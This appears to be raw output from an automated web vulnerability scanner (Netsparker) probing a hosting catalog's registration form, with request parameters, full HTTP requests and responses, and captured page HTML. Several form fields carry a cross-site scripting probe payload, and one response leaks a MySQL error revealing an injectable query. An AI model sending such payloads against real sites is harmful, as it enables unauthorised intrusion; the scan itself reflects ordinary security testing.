coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='C4C0A65D598D2DD53CCC9E1B3E992A76C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='C4C0A65D598D2DD53318C6AB1E5F540A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='C4C0A65D598D2DD54FADFA971CE5AFD7C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD5FC2CAB3FB60C8FCCC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='C4C0A65D598D2DD500DD1A946CAB48706F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='C4C0A65D598D2DD5C241E0B4CC7F1ED9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='C4C0A65D598D2DD554C29A8C08ED61FFC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='C4C0A65D598D2DD58B804237E193AE596F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='C4C0A65D598D2DD573358E87656AC428C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='C4C0A65D598D2DD56E219DF54CFF55856F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='C4C0A65D598D2DD53C1764EA918657E7C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='C4C0A65D598D2DD56F3130A0DCAB8223C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='C4C0A65D598D2DD58A3261C0CDB26EC4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD58AFC62030B087284C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='C4C0A65D598D2DD503A47B4503C4B712C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='C4C0A65D598D2DD520C8F00148577871C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='C4C0A65D598D2DD5E8FBEB22BCF939866F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='C4C0A65D598D2DD57483B06B4E0184606F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='C4C0A65D598D2DD5824B8496A7EC0F6F6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
'"--></style></script><script>alert(0x001CBF)</script>
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 579 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CBF)%3c%2fscript%3e©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 338 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001CBF)</script>'' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''"--></style></script><script>netsparker(0x001CBF)</script>'
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
'"--></style></script><script>alert(0x001CDE)</script>
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CDE)%3c%2fscript%3e&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE356073A28FDE8C61DFA1B8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE3560735164D096A5C540FC6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE35607353D4088C75E0C98EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073EBDB906A0705CD28C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE356073C2C5DD3B2140AD4A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073E7686D120E9FC1EFC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE3560730E29204A0A62139DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE35607369393E6BD3B9082E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE356073B684FACF2E0BAA98C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE3560732F27CDF985FF60C06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='325A5101EE35607386F14BEAF3B24ED4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE356073F7DA583E2BA7F856C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE35607324843899875061D2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE3560730EE30AF638B18D51C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE3560737CDC0154D4D85E77C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE3560739B803AD707AA3104C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE35607363B9AAF3D26A24C36F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE356073C90502BAE12E97E46F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE356073E4928E5F38EB685E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
'"--></style></script><script>alert(0x001CDF)</script>
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
